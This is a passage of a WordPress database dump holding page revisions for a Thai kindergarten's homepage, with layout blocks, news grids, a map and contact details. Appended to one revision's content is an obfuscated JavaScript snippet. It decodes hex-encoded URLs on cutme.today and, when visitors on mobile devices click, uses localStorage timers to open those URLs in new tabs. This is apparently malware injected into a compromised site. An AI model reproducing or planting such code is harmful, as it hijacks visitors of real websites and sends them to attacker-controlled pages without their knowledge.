{\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 16:40:07','2025-07-15 09:40:07','',19,'http://watprato.ssk.in.th/?p=720',0,'revision','',0),
(721,1,'2025-07-15 16:42:09','2025-07-15 09:42:09','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_fac40f-62\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_937c93-07\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_937c93-07\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- 